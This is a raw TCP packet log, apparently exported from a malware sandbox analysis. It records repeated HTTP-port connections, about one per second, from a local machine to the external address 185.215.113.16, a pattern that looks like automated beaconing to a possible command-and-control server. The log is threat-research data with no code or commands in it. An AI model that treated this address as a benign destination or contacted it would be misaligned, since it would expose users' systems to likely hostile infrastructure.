                    Sep 27, 2024 08:41:37.433123112 CEST8053684185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:38.118551016 CEST8053684185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:38.121882915 CEST5368480192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:38.125179052 CEST5368480192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:38.130045891 CEST8053684185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:38.346129894 CEST8053684185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:38.346261024 CEST5368480192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:38.455945969 CEST5368480192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:38.456429958 CEST5368580192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:38.461124897 CEST8053684185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:38.461253881 CEST5368480192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:38.461282015 CEST8053685185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:38.461360931 CEST5368580192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:38.461518049 CEST5368580192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:38.466353893 CEST8053685185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:39.167851925 CEST8053685185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:39.168025970 CEST5368580192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:39.169132948 CEST5368580192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:39.174117088 CEST8053685185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:39.684541941 CEST8053685185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:39.684638023 CEST8053685185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:39.684644938 CEST5368580192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:39.685029030 CEST5368580192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:39.797272921 CEST5368580192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:39.797854900 CEST5368680192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:39.802800894 CEST8053685185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:39.802851915 CEST8053686185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:39.802942991 CEST5368580192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:39.802983046 CEST5368680192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:39.803195953 CEST5368680192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:39.807985067 CEST8053686185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:40.658236027 CEST8053686185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:40.658302069 CEST5368680192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:40.659076929 CEST5368680192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:40.663918972 CEST8053686185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:40.900990009 CEST8053686185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:40.901058912 CEST5368680192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:41.015840054 CEST5368680192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:41.016199112 CEST5368780192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:41.020971060 CEST8053686185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:41.021039963 CEST8053687185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:41.021040916 CEST5368680192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:41.021147966 CEST5368780192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:41.021311045 CEST5368780192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:41.026108980 CEST8053687185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:41.718357086 CEST8053687185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:41.719947100 CEST5368780192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:41.720546961 CEST5368780192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:41.725416899 CEST8053687185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:41.943465948 CEST8053687185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:41.943852901 CEST5368780192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:42.047406912 CEST5368780192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:42.047657967 CEST5368880192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:42.052643061 CEST8053688185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:42.052730083 CEST5368880192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:42.052783966 CEST8053687185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:42.052840948 CEST5368780192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:42.052902937 CEST5368880192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:42.057832003 CEST8053688185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:42.864432096 CEST8053688185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:42.864502907 CEST5368880192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:42.865288019 CEST5368880192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:42.870143890 CEST8053688185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:43.087995052 CEST8053688185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:43.088063955 CEST5368880192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:43.203300953 CEST5368880192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:43.203659058 CEST5368980192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:43.208579063 CEST8053689185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:43.208703041 CEST5368980192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:43.208861113 CEST5368980192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:43.208915949 CEST8053688185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:43.208972931 CEST5368880192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:43.213757038 CEST8053689185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:43.918236017 CEST8053689185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:43.922149897 CEST5368980192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:43.922761917 CEST5368980192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:43.927634001 CEST8053689185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:44.148511887 CEST8053689185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:44.148619890 CEST5368980192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:44.250305891 CEST5368980192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:44.250612974 CEST5369080192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:44.255507946 CEST8053690185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:44.255625963 CEST5369080192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:44.255667925 CEST8053689185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:44.255726099 CEST5368980192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:44.255822897 CEST5369080192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:44.260613918 CEST8053690185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:44.964474916 CEST8053690185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:44.964596987 CEST5369080192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:44.976711988 CEST5369080192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:44.981626034 CEST8053690185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:45.206270933 CEST8053690185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:45.206351995 CEST5369080192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:45.312939882 CEST5369080192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:45.313257933 CEST5369180192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:45.319763899 CEST8053691185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:45.319875956 CEST5369180192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:45.320103884 CEST8053690185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:45.320173025 CEST5369080192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:45.321666002 CEST5369180192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:45.328167915 CEST8053691185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:46.028835058 CEST8053691185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:46.028884888 CEST5369180192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:46.031699896 CEST5369180192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:46.036489010 CEST8053691185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:46.262418032 CEST8053691185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:46.262573004 CEST5369180192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:46.375391960 CEST5369180192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:46.375765085 CEST5369280192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:46.380526066 CEST8053691185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:46.380599976 CEST5369180192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:46.380642891 CEST8053692185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:46.380737066 CEST5369280192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:46.380853891 CEST5369280192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:46.385624886 CEST8053692185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:47.098800898 CEST8053692185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:47.099816084 CEST5369280192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:47.100455999 CEST5369280192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:47.105230093 CEST8053692185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:47.330893040 CEST8053692185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:47.333856106 CEST5369280192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:47.438463926 CEST5369280192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:47.438776016 CEST5369380192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:47.443680048 CEST8053692185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:47.443696022 CEST8053693185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:47.443738937 CEST5369280192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:47.443769932 CEST5369380192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:47.443898916 CEST5369380192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:47.448657036 CEST8053693185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:48.173223972 CEST8053693185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:48.173280954 CEST5369380192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:48.173963070 CEST5369380192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:48.180486917 CEST8053693185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:48.603090048 CEST8053693185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:48.606894970 CEST5369380192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:48.718911886 CEST5369380192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:48.719219923 CEST5369480192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:48.723992109 CEST8053693185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:48.724009037 CEST8053694185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:48.724083900 CEST5369380192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:48.724117994 CEST5369480192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:48.724303007 CEST5369480192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:48.729034901 CEST8053694185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:49.413585901 CEST8053694185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:49.415828943 CEST5369480192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:49.416544914 CEST5369480192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:49.421406984 CEST8053694185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:49.639203072 CEST8053694185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:49.639256954 CEST5369480192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:49.750261068 CEST5369480192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:49.750595093 CEST5369580192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:50.002224922 CEST8053695185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:50.002352953 CEST5369580192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:50.002382994 CEST8053694185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:50.002443075 CEST5369480192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:50.002728939 CEST5369580192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:50.008121014 CEST8053695185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:50.710978985 CEST8053695185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:50.711064100 CEST5369580192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:50.715487957 CEST5369580192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:50.720223904 CEST8053695185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:50.945640087 CEST8053695185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:50.945748091 CEST5369580192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:51.047204018 CEST5369580192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:51.047583103 CEST5369680192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:51.052526951 CEST8053696185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:51.052611113 CEST5369680192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:51.052644968 CEST8053695185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:51.052695036 CEST5369580192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:51.052850962 CEST5369680192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:51.057636023 CEST8053696185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:51.768160105 CEST8053696185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:51.768225908 CEST5369680192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:51.769032001 CEST5369680192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:51.969607115 CEST8053696185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:52.185519934 CEST8053696185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:52.185594082 CEST5369680192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:52.299652100 CEST5369680192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:52.300034046 CEST5369780192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:52.304672956 CEST8053696185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:52.304744959 CEST5369680192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:52.304790974 CEST8053697185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:52.304862022 CEST5369780192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:52.305027962 CEST5369780192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:52.309747934 CEST8053697185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:53.605277061 CEST8053697185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:53.605374098 CEST5369780192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:53.605401993 CEST8053697185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:53.605456114 CEST8053697185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:53.605472088 CEST5369780192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:53.605504036 CEST5369780192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:53.606184006 CEST5369780192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:53.614335060 CEST8053697185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:53.836357117 CEST8053697185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:53.836435080 CEST5369780192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:53.937716007 CEST5369780192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:53.938159943 CEST5369880192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:53.942958117 CEST8053697185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:53.942971945 CEST8053698185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:53.943021059 CEST5369780192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:53.943058968 CEST5369880192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:53.943285942 CEST5369880192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:53.948076010 CEST8053698185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:54.735652924 CEST8053698185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:54.735730886 CEST5369880192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:54.736474037 CEST5369880192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:54.741270065 CEST8053698185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:54.965523005 CEST8053698185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:54.965601921 CEST5369880192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:55.078391075 CEST5369880192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:55.078705072 CEST5369980192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:55.083734035 CEST8053699185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:55.083888054 CEST8053698185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:55.083988905 CEST5369880192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:55.084011078 CEST5369980192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:55.084219933 CEST5369980192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:55.089018106 CEST8053699185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:55.824083090 CEST8053699185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:55.824193954 CEST5369980192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:55.825264931 CEST5369980192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:55.830043077 CEST8053699185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:56.053215027 CEST8053699185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:56.053308964 CEST5369980192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:56.173564911 CEST5369980192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:56.174247980 CEST5370080192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:56.178802013 CEST8053699185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:56.178870916 CEST5369980192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:56.179044008 CEST8053700185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:56.179466963 CEST5370080192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:56.179466963 CEST5370080192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:56.184288979 CEST8053700185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:56.891860962 CEST8053700185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:56.894040108 CEST5370080192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:56.897488117 CEST5370080192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:56.902324915 CEST8053700185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:57.123625994 CEST8053700185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:57.125058889 CEST5370080192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:57.235025883 CEST5370080192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:57.235460043 CEST5370180192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:57.240387917 CEST8053700185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:57.240413904 CEST8053701185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:57.240506887 CEST5370080192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:57.240566015 CEST5370180192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:57.240823984 CEST5370180192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:57.245613098 CEST8053701185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:57.962990046 CEST8053701185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:57.963072062 CEST5370180192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:57.968017101 CEST5370180192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:57.972814083 CEST8053701185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:58.198936939 CEST8053701185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:58.199053049 CEST5370180192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:58.313200951 CEST5370180192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:58.313612938 CEST5370280192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:58.318696976 CEST8053702185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:58.318727016 CEST8053701185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:58.318836927 CEST5370280192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:58.318901062 CEST5370180192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:58.319080114 CEST5370280192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:58.323815107 CEST8053702185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:59.045985937 CEST8053702185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:59.047919035 CEST5370280192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:59.050137997 CEST5370280192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:59.055052996 CEST8053702185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:59.285262108 CEST8053702185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:59.286053896 CEST5370280192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:59.429984093 CEST5370280192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:59.434854031 CEST5370380192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:59.435106039 CEST8053702185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:59.435167074 CEST5370280192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:59.439737082 CEST8053703185.215.113.16192.168.2.4
                    Sep 27, 2024 08:41:59.440045118 CEST5370380192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:59.745620966 CEST5370380192.168.2.4185.215.113.16
                    Sep 27, 2024 08:41:59.750566959 CEST8053703185.215.113.16192.168.2.4
                    Sep 27, 2024 08:42:00.140475988 CEST8053703185.215.113.16192.168.2.4
                    Sep 27, 2024 08:42:00.140544891 CEST5370380192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:00.141350031 CEST5370380192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:00.146133900 CEST8053703185.215.113.16192.168.2.4
                    Sep 27, 2024 08:42:00.367666006 CEST8053703185.215.113.16192.168.2.4
                    Sep 27, 2024 08:42:00.367837906 CEST5370380192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:00.468919039 CEST5370380192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:00.469309092 CEST5370480192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:00.474158049 CEST8053704185.215.113.16192.168.2.4
                    Sep 27, 2024 08:42:00.474217892 CEST8053703185.215.113.16192.168.2.4
                    Sep 27, 2024 08:42:00.474244118 CEST5370480192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:00.474282980 CEST5370380192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:00.474468946 CEST5370480192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:00.479238987 CEST8053704185.215.113.16192.168.2.4
                    Sep 27, 2024 08:42:01.174871922 CEST8053704185.215.113.16192.168.2.4
                    Sep 27, 2024 08:42:01.174983025 CEST5370480192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:01.175734997 CEST5370480192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:01.180541992 CEST8053704185.215.113.16192.168.2.4
                    Sep 27, 2024 08:42:01.396397114 CEST8053704185.215.113.16192.168.2.4
                    Sep 27, 2024 08:42:01.396522999 CEST5370480192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:01.500355959 CEST5370480192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:01.500658035 CEST5370580192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:01.505513906 CEST8053704185.215.113.16192.168.2.4
                    Sep 27, 2024 08:42:01.505548000 CEST8053705185.215.113.16192.168.2.4
                    Sep 27, 2024 08:42:01.505592108 CEST5370480192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:01.505661011 CEST5370580192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:01.505740881 CEST5370580192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:01.510453939 CEST8053705185.215.113.16192.168.2.4
                    Sep 27, 2024 08:42:02.221412897 CEST8053705185.215.113.16192.168.2.4
                    Sep 27, 2024 08:42:02.221496105 CEST5370580192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:02.245461941 CEST5370580192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:02.250397921 CEST8053705185.215.113.16192.168.2.4
                    Sep 27, 2024 08:42:02.478046894 CEST8053705185.215.113.16192.168.2.4
                    Sep 27, 2024 08:42:02.480051994 CEST5370580192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:02.594182968 CEST5370580192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:02.594449043 CEST5370680192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:02.599298954 CEST8053706185.215.113.16192.168.2.4
                    Sep 27, 2024 08:42:02.599380016 CEST5370680192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:02.599476099 CEST5370680192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:02.599554062 CEST8053705185.215.113.16192.168.2.4
                    Sep 27, 2024 08:42:02.599613905 CEST5370580192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:02.905877113 CEST5370680192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:02.957334042 CEST8053705185.215.113.16192.168.2.4
                    Sep 27, 2024 08:42:02.957438946 CEST5370580192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:02.957627058 CEST8053706185.215.113.16192.168.2.4
                    Sep 27, 2024 08:42:02.957640886 CEST8053706185.215.113.16192.168.2.4
                    Sep 27, 2024 08:42:02.962227106 CEST8053705185.215.113.16192.168.2.4
                    Sep 27, 2024 08:42:03.702111006 CEST8053706185.215.113.16192.168.2.4
                    Sep 27, 2024 08:42:03.702409029 CEST5370680192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:03.710588932 CEST5370680192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:03.711297989 CEST5370780192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:03.715713024 CEST8053706185.215.113.16192.168.2.4
                    Sep 27, 2024 08:42:03.715775013 CEST5370680192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:03.716095924 CEST8053707185.215.113.16192.168.2.4
                    Sep 27, 2024 08:42:03.716178894 CEST5370780192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:03.716547012 CEST5370780192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:03.721291065 CEST8053707185.215.113.16192.168.2.4
                    Sep 27, 2024 08:42:04.431354046 CEST8053707185.215.113.16192.168.2.4
                    Sep 27, 2024 08:42:04.431824923 CEST5370780192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:04.549987078 CEST5370780192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:04.550982952 CEST5370880192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:04.555305958 CEST8053707185.215.113.16192.168.2.4
                    Sep 27, 2024 08:42:04.555423975 CEST5370780192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:04.555852890 CEST8053708185.215.113.16192.168.2.4
                    Sep 27, 2024 08:42:04.556389093 CEST5370880192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:04.557512045 CEST5370880192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:04.562262058 CEST8053708185.215.113.16192.168.2.4
                    Sep 27, 2024 08:42:05.254632950 CEST8053708185.215.113.16192.168.2.4
                    Sep 27, 2024 08:42:05.254729033 CEST5370880192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:05.257847071 CEST5370880192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:05.258390903 CEST5370980192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:05.262991905 CEST8053708185.215.113.16192.168.2.4
                    Sep 27, 2024 08:42:05.263123989 CEST5370880192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:05.263185978 CEST8053709185.215.113.16192.168.2.4
                    Sep 27, 2024 08:42:05.263500929 CEST5370980192.168.2.4185.215.113.16
